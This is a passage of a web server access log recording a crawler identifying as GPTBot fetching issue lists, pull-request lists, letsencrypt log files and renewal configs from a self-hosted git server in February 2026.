74.7.227.38] [Length 9973] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=open&type=all" -[17/Feb/2026:18:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10161] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&state=open&type=all" -[17/Feb/2026:18:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPatrol%20Window%20Service%20%eb%93%b1%eb%a1%9d%2fwatchdog.spec" [Client 74.7.227.38] [Length 22749] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" -[17/Feb/2026:18:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:55:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:55:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7?display=source" [Client 74.7.227.38] [Length 11192] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:18:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4?display=source" [Client 74.7.227.38] [Length 23975] [Gzip 5.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:18:55:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2?display=source" [Client 74.7.227.38] [Length 31545] [Gzip 6.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:18:55:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5?display=source" [Client 74.7.227.38] [Length 33690] [Gzip 6.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:18:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6?display=source" [Client 74.7.227.38] [Length 36076] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:18:55:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3?display=source" [Client 74.7.227.38] [Length 39003] [Gzip 6.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:18:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1?display=source" [Client 74.7.227.38] [Length 33880] [Gzip 6.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:18:55:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11951] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:18:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11945] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:18:55:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11952] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:18:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11917] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:18:55:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11955] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:18:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:55:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" -[17/Feb/2026:18:55:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:18:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9965] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:55:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&state=all&type=all" -[17/Feb/2026:18:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:55:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:18:55:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&project=-1&state=closed&type=all" -[17/Feb/2026:18:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:55:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=latest&state=closed&type=all" -[17/Feb/2026:18:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" -[17/Feb/2026:18:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:55:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10174] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:55:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:55:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" -[17/Feb/2026:18:55:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:18:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:56:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10905] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" -[17/Feb/2026:18:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:56:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10051] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:56:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=latest&state=closed&type=all" -[17/Feb/2026:18:56:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:56:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr 